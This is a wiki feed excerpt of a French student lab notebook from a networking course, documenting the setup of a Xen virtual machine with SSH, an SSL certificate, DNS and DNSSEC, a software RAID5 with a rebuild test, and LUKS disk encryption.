 mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
 vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose crypt_sd&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46345</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46345"/>
				<updated>2017-11-17T13:41:42Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Sécurisation des données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
Commandes de base pour démarrer la VM proprement: &lt;br /&gt;
&lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
 xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
 ssh username@weppes&lt;br /&gt;
 ssh root@193.48.57.179&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
Nous commencons par acheter un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
 &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
 -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
 Listen 80&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;banane.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.banane.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
On créée ensuite le fichier db.banane.space:&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.banane.space. root.banane.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns.banane.space. &lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.179&lt;br /&gt;
 www     IN      A       193.48.57.179&lt;br /&gt;
 @       IN      A       193.48.57.179&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
 search banane.space&lt;br /&gt;
 nameserver 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''DNS SEC''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques: &lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE banane.space&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE banane.space&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs: &lt;br /&gt;
&lt;br /&gt;
 /etc/bind/banane.space.dnssec# ls&lt;br /&gt;
 ????&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les zones:&lt;br /&gt;
&lt;br /&gt;
 dnssec-signzone -o banane.space -k banane.space-ksk &lt;br /&gt;
 ../db.banane.space banane.space-zsk&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Nous créons trois nouvelles partitions qui vont représenter nos disques.&lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ces partitions dans la machine virtuelle via le fichier IMA5-BANANe.conf&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    4) mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues. On sauvegarde ensuite la configuration actelle.&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
 root@IMA5-BANANE:~# mkfs /dev/md0&lt;br /&gt;
 root@IMA5-BANANE:~# mkdir /datamd0&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être sûr que la partition soit encore montée après le reboot:&lt;br /&gt;
 /dev/md0 /datamd0&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# vim raid5test.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
    5) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    6) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous arrêtons la MV, mettons en commentaire la 1ère partition dans le fichier de configuration, puis redémarrons la machine.&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# ls /datamd0/&lt;br /&gt;
 raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours: Suppression de la partition xvdd:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --set-faulty /dev/md0 /dev/xvdd&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --remove /dev/md0 /dev/xvdd&lt;br /&gt;
 La partition est bien supprimée:&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&lt;br /&gt;
On remet à présent la partition supprimée:&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
On essaie ensuite de remonter le RAID5 et on peut constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&lt;br /&gt;
    7) root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
 mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
 vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose crypt_sd&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
